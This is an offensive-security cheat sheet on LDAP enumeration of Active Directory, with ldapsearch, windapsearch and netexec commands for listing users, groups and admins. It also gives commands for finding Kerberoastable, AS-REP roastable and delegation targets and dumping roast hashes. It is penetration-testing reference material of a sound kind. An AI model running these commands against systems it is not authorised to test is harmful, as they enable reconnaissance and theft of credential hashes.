← All cheat sheets

LDAP-ENUM

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

LDAP is the query protocol underneath Active Directory. It is the
enumeration primitive behind BloodHound, Kerberoasting target
discovery, and AD recon. This sheet covers ldapsearch, windapsearch,
and nxc/ldeep for directory enumeration.

CONNECTION BASICS#

ldapsearch -x -H ldap://<dc-ip> -s base       # Anonymous root DSE
ldapsearch -x -H ldap://<dc-ip> -s base namingContexts
                                              # Get base DN
ldapsearch -x -H ldap://<dc-ip> -b "DC=corp,DC=lu"
                                              # Anonymous bind
ldapsearch -x -H ldaps://<dc-ip>:636          # LDAPS (TLS)
# Authenticated (simple bind):
ldapsearch -x -H ldap://<dc-ip> \
  -D "user@corp.lu" -w "Password1" -b "DC=corp,DC=lu"

ROOT DSE / DOMAIN INFO#

ldapsearch -x -H ldap://<dc> -s base '(objectclass=*)'
ldapsearch -x -H ldap://<dc> -s base namingContexts defaultNamingContext
ldapsearch -x -H ldap://<dc> -s base supportedLDAPVersion
ldapsearch -x -H ldap://<dc> -s base dnsHostName serverName

USER ENUMERATION#

ldapsearch -x -H ldap://<dc> -D "$U" -w "$P" -b "$BASE" \
  "(objectClass=user)" sAMAccountName
ldapsearch ... "(&(objectClass=user)(objectCategory=person))" \
  sAMAccountName description memberOf
# Users with SPN (Kerberoastable):
ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName
# AS-REP roastable (no preauth):
ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" \
  sAMAccountName

GROUP ENUMERATION#

ldapsearch ... "(objectClass=group)" sAMAccountName member
# Domain Admins members:
ldapsearch ... "(&(objectClass=group)(cn=Domain Admins))" member
# Nested group membership of a user:
ldapsearch ... "(sAMAccountName=<user>)" memberOf

COMPUTER & DELEGATION#

ldapsearch ... "(objectClass=computer)" \
  dNSHostName operatingSystem sAMAccountName
# Unconstrained delegation (TRUSTED_FOR_DELEGATION):
ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
# Constrained delegation targets:
ldapsearch ... "(msDS-AllowedToDelegateTo=*)" \
  sAMAccountName msDS-AllowedToDelegateTo

USEFUL UAC BIT FILTERS#

# Disabled accounts:            :=2
# Password never expires:       :=65536
# No preauth (AS-REP):          :=4194304
# Trusted for delegation:       :=524288
# Syntax: (userAccountControl:1.2.840.113556.1.4.803:=<bit>)

WINDAPSEARCH#

windapsearch -d corp.lu --dc-ip <dc> -u <user> -p <pass> -U
                                              # All users
windapsearch ... --computers                  # All computers
windapsearch ... --groups                     # All groups
windapsearch ... --da                         # Domain Admins
windapsearch ... --privileged-users           # Privileged users
windapsearch ... --unconstrained-users        # Unconstrained deleg
windapsearch ... --admin-objects              # AdminSDHolder objects

NETEXEC (nxc) LDAP#

nxc ldap <dc> -u <user> -p <pass> --users     # Enumerate users
nxc ldap <dc> -u <user> -p <pass> --groups    # Groups
nxc ldap <dc> -u <user> -p <pass> --kerberoasting out.txt
nxc ldap <dc> -u <user> -p <pass> --asreproast out.txt
nxc ldap <dc> -u <user> -p <pass> --trusted-for-delegation
nxc ldap <dc> -u <user> -p <pass> -M ldap-checker  # Signing/channel binding

EXAMPLES#

# Anonymous discovery of the base DN
ldapsearch -x -H ldap://10.0.0.1 -s base namingContexts

# Dump all Kerberoastable service accounts
ldapsearch -x -H ldap://dc -D "$U" -w "$P" -b "DC=corp,DC=lu" \
  "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName

# One-shot roast + AS-REP hunt with netexec
nxc ldap dc -u svc -p 'Pass' --kerberoasting k.txt --asreproast a.txt

# Find unconstrained delegation hosts (high-value pivots)
windapsearch -d corp.lu --dc-ip 10.0.0.1 -u u -p p --unconstrained-users

NOTES#

- Anonymous binds are often disabled; expect to need creds
- LDAP signing / channel binding enforcement blocks relay - the
  nxc ldap-checker module reports this posture
- The 1.2.840.113556.1.4.803 OID is the AND bitwise match rule
- Feed SPN/AS-REP output into KERBEROASTING.txt workflows
- ldeep is a strong alternative for structured JSON dumps
- Prefer LDAPS (636) to avoid credentials in cleartext on the wire